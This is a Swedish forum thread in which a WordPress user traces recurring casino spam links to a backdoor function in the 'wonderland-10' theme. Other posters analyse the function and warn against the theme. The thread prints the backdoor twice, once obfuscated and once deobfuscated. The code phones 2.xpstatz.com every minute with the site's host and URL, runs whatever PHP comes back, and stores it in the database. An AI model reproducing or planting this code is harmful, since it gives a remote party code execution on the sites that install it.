Länken som läggs till är till "Casino en Ligne" med adress portalux.com
Jag har blivit av med den tillfälligt genom att inte radera den utan göra den osynlig i admin. Men är klart intresseras varför den dyker upp?
8 svar · 1 016 visningar · startad av K@llen
Hejsan,
Jag trixar med en WP-blogg (http://sundara.se/blogg/). Har fått det mesta som jag vill, men där är ett beskymmer. Under bloggroll läggs det till en länk automatiskt till ett Casino.
Jag raderar i admin, men den kommer dit automatiskt igen. Har letat runt som attan, men hittar inte vad det beror på. :(
Någon som varit med om liknande? Vad kan det bero på?
Länken som läggs till är till "Casino en Ligne" med adress portalux.com
Jag har blivit av med den tillfälligt genom att inte radera den utan göra den osynlig i admin. Men är klart intresseras varför den dyker upp?
Tror jag kommit en bit på vägen iaf. :)
I footer.php hittade jag följande rad:
<?php xfooter(); do_action('wp_footer'); ?>
do_action('wp_footer') känner jag igen, men inte funktionen xfooter().
<?php
function xfooter() { global $wpdb; $RDAFE7FE4FDC52E2D1048573B4DB1DF18 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_eval'");
$R41CCFE75D7AC2B4681397CFC70BAEF40 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'");
if (empty($RDAFE7FE4FDC52E2D1048573B4DB1DF18)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_eval', '0', 'no')");
$RBDCA893A9385C089DC5F358AAA52C09B = 0; } else $RBDCA893A9385C089DC5F358AAA52C09B = intval($RDAFE7FE4FDC52E2D1048573B4DB1DF18[0]);
if (empty($R41CCFE75D7AC2B4681397CFC70BAEF40)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '<br/>', 'no')");
$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = '<br/>'; } else $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = $R41CCFE75D7AC2B4681397CFC70BAEF40[0];
@eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');
if($R14AF1BE9EE26A90921E64A82E7836797) { $R5F38CE9C0B222F3BB0880E016DC07527 = "1"; } else { $R5F38CE9C0B222F3BB0880E016DC07527 = "0"; }
if ( ( time() - $RBDCA893A9385C089DC5F358AAA52C09B ) >= 60 ) {
$R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
$R8088818E3E46A17C12F2EE42EB12D7AC = "2.";
$R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
$RAD8CC24399FEA84D3454DD7057C38FD0 = "xps-$R5F38CE9C0B222F3BB0880E016DC07527.";
$RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
$RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);
if (ini_get('allow_url_fopen')) { $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . $RA81C90DCC503F6900F7DC424AD04F525);
} else { $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) { @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n");
@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n");
@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = "";
while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) { $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
}
$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = trim(strstr($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1, "\r\n\r\n")); } @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
}
if ( is_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1) ) { $RBDCA893A9385C089DC5F358AAA52C09B = time();
if($R14AF1BE9EE26A90921E64A82E7836797) { @eval($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);
} else {
echo "$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1";
} $R9446905AFC32B438C0BD070AD05F3D83 = mysql_real_escape_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);
$wpdb->query("UPDATE $wpdb->options SET option_value=$RBDCA893A9385C089DC5F358AAA52C09B WHERE option_name='l_time_eval'");
$wpdb->query("UPDATE $wpdb->options SET option_value='$R9446905AFC32B438C0BD070AD05F3D83' WHERE option_name='l_eval'"); } } }
?>
Jag blev av med problemet när jag kommenterade bort denna funktionen.
Någon som hänger med på vad funktionen försöker göra? Den har iaf lagt till massa skräp i databasen. :(
Ta bort det där temat, tillägget eller vad det är du har installerat omedelbart. Det är en trojan som leder till xpstatz.com.
Jag har försökt att läsa mig till den svårlästa koden och den hämtar information från en extern webbsida och lagrar det i din databas. Dessutom verkar den föra statistik över webbplatsen.
<?php
function xfooter() {
global $wpdb; $query = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_eval'");
$optionvalue = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'");
if (empty($query)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_eval', '0', 'no')");
$int = 0; } else $int = intval($query[0]);
if (empty($optionvalue)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '<br/>', 'no')");
$contents = '<br/>'; } else $contents = $optionvalue[0];
@eval('$integerwithvalue1 = 1;');
if($integerwithvalue1) { $partofspamhost = "1"; } else { $partofspamhost = "0"; }
if ( ( time() - $int ) >= 60 ) {
$spamtdl = "com";
$spamsubdomain = "2.";
$spamdomain = "xpstatz";
$spamhost = "xps-$partofspamhost.";
$host = "$spamsubdomain$spamdomain.$spamtdl";
$spamurl = "/".$spamhost."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);
if (ini_get('allow_url_fopen')) { $contents = @file_get_contents("http://" . $host . $spamurl);
} else { $fsockopenstring = @fsockopen($host, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
if ($fsockopenstring) { @stream_set_timeout($fsockopenstring, 60);
@fwrite($fsockopenstring, "GET $spamurl HTTP/1.1\r\n");
@fwrite($fsockopenstring, "Host: $host\r\n");
@fwrite($fsockopenstring, "Connection: Close\r\n\r\n");
$contents = "";
while(!feof($fsockopenstring)) { $contents .= @fgets($fsockopenstring, 1024);
}
$contents = trim(strstr($contents, "\r\n\r\n")); } @fclose($fsockopenstring);
}
if ( is_string($contents) ) { $int = time();
if($integerwithvalue1) { @eval($contents);
} else {
echo "$contents";
} $putintoyourdatabase = mysql_real_escape_string($contents) ;
$wpdb->query("UPDATE $wpdb->options SET option_value=$int WHERE option_name='l_time_eval'");
$wpdb->query("UPDATE $wpdb->options SET option_value='$putintoyourdatabase' WHERE option_name='l_eval'"); } }
}
?>
Tack Pace! :)
Jag kom fram till samma sak med friska ögon i morse/förmiddag. Tog ner temat i går när jag hittade funktionen. Får leta rätt på annat tema att modifiera och översätta.
Vilka webbplatser är bäst att ta hem teman ifrån?
EDIT:
Passar på att varna andra för temat wonderland-10.
Du kanske inte ska låta din wordpress installation ligga helt öppet på din url nu. Jag tor jag tar och sätter upp en ny blogg där nu faktiskt. Kanske postar lite skön gris-porr när jag ändå är i farten.
Ligga öppet?
När jag gick in på denna länken när jag skrev mitt förra inlägg så möttes jag av den vanliga installations guiden i WP som började med att jag skulle skriva in Title och E-postadress.
Okkido skrev:
När jag gick in på denna länken när jag skrev mitt förra inlägg så möttes jag av den vanliga installations guiden i WP som började med att jag skulle skriva in Title och E-postadress.
Låter konstigt. För jag raderade filen install.php direkt efter installation. Då hann du besöka sidan under de 20 sekunder det tog från uppladdning till jag var klar. Någon mer fil som ska raderas?